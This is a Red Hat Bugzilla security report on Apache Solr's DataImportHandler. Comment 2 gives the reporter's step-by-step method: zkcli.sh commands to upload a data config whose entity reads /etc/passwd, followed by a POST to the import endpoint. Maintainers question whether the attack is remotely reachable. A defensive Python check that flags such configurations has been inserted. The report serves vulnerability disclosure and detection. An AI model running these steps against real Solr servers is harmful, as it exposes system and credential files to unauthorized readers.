Bug 1289854 - apache solr: export data in datahandler
Product: Security Response
Classification: Other
Component: vulnerability
Severity: high
Assigned To: Red Hat Product Security
Reported: 2015-12-09 02:38 EST by liaoxinxi
Modified: 2016-02-02 01:10 EST
Doc Type: Bug Fix
Last Closed: 2016-02-02 01:10:18 EST
Type: Bug

Description liaoxinxi 2015-12-09 02:38:00 EST
The Solr DataImportHandler leads to data export when the debug and verbose switches are on. A remote hacker can turn on the DataImportHandler with some config file. As we all know, the data import feature can import any file; if this feature is not enabled, we can turn the feature on by modifying the configuration file, following the steps described here. This file can also be a sensitive system file, such as /etc/passwd, and the Solr system provides debugging; turn it on to get sensitive information. The following is the request:

POST /solr/gettingstarted_shard1_replica2/dataimport HTTP/1.1

we can get the response:

HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Content-Length: 2917

        null,"----------- row #1-------------",
Comment 1 Jason Shepherd 2016-01-03 20:32:47 EST
Thanks liaoxinxi for reporting this issue. I think the Solr Java process would only have access to read files which its Unix user has access to. Therefore if you have access to the filesystem to modify configuration you could just read the /etc/passwd file without solr.

Could you provide more details about how a remote hacker could "can turn on the dataimporthandler with some config file"? If it's possible to modify configuration remotely, that could be a security issue.
Comment 2 liaoxinxi 2016-01-12 03:57:39 EST
I'm sorry, I forgot the steps for how to turn on the dataimporter function remotely.
The first step: ./server/scripts/cloud-scripts/zkcli.sh -zkhost -cmd getfile /configs/solr/solrconfig.xml solrconfig.xml
Add the following:

<lib dir="${solr.install.dir:../../../../dist}" regex="..solr-dataimporthandler-*\jar" />

   <requestHandler name="/dataimport" class="solr.DataImportHandler">
     <lst name="defaults">
       <str name="config">solr-data-config.xml</str>
     </lst>
   </requestHandler>
then upload 

Step 2: Upload solr-data-config.xml, which reads as follows:
<dataConfig>
     <dataSource type="BinFileDataSource" />
     <document>
         <entity name="tika-test" processor="TikaEntityProcessor"
                 url="/etc/passwd" format="text">
                 <field column="text" name="text" />
         </entity>
     </document>
</dataConfig>

./server/scripts/cloud-scripts/zkcli.sh -zkhost -cmd putfile /configs/gettingstarted/solr-data-config.xml solr-data-config.xml

Step 3: from the web interface, press reload to reload the configuration.

Step 4: send the POST request.
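
A defensive check for the configuration change described in Comment 2, as an added example that is not part of the original report or of Solr: it scans a collection's solrconfig.xml for a registered DataImportHandler and the referenced data config for entities that read absolute local paths through a file data source. The function names and the sample XML are constructed for illustration.

```python
import xml.etree.ElementTree as ET

DIH_CLASSES = {"solr.DataImportHandler",
               "org.apache.solr.handler.dataimport.DataImportHandler"}
FILE_SOURCES = {"BinFileDataSource", "FileDataSource"}

def dih_handlers(solrconfig_xml):
    """Return (handler path, data-config file) for every registered DIH handler."""
    found = []
    for rh in ET.fromstring(solrconfig_xml).iter("requestHandler"):
        if rh.get("class") in DIH_CLASSES:
            cfg = rh.find("./lst[@name='defaults']/str[@name='config']")
            has_text = cfg is not None and cfg.text
            found.append((rh.get("name"), cfg.text.strip() if has_text else None))
    return found

def local_file_entities(data_config_xml):
    """Return (entity name, url) for entities reading an absolute local path."""
    root = ET.fromstring(data_config_xml)
    if not any(ds.get("type") in FILE_SOURCES for ds in root.iter("dataSource")):
        return []
    return [(e.get("name"), e.get("url")) for e in root.iter("entity")
            if (e.get("url") or "").startswith("/")]

# Constructed samples modelled on the snippets in Comment 2.
SAMPLE_SOLRCONFIG = """<config>
  <requestHandler name="/select" class="solr.SearchHandler"/>
  <requestHandler name="/dataimport" class="solr.DataImportHandler">
    <lst name="defaults"><str name="config">solr-data-config.xml</str></lst>
  </requestHandler>
</config>"""

SAMPLE_DATA_CONFIG = """<dataConfig>
  <dataSource type="BinFileDataSource"/>
  <document>
    <entity name="tika-test" processor="TikaEntityProcessor"
            url="/etc/passwd" format="text">
      <field column="text" name="text"/>
    </entity>
  </document>
</dataConfig>"""

if __name__ == "__main__":
    for name, cfg in dih_handlers(SAMPLE_SOLRCONFIG):
        print(f"DataImportHandler registered at {name}, config={cfg}")
    for name, url in local_file_entities(SAMPLE_DATA_CONFIG):
        print(f"entity {name!r} reads local path {url}")
```

Run against the files fetched from ZooKeeper or the core's conf directory; any hit on a collection that is not meant to import data is worth reviewing together with who has write access to that configuration.
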
Comment 3 Jason Shepherd 2016-01-13 01:12:33 EST
After installing the 'solr' package on Fedora 22 and 23, I don't see the zkcli.sh command. These are the files installed:

[root@336a10ac27fb /]# rpm -ql solr

Can you check to make sure you obtained Solr from the Fedora repositories?

[root@336a10ac27fb /]# dnf provides solr
solr-4.10.3-3.fc22.noarch : Ultra-fast Lucene-based Search Server
Repo        : fedora

If you've obtained Solr directly from Apache, I'd suggest you contact Apache about this issue via security@apache.org.
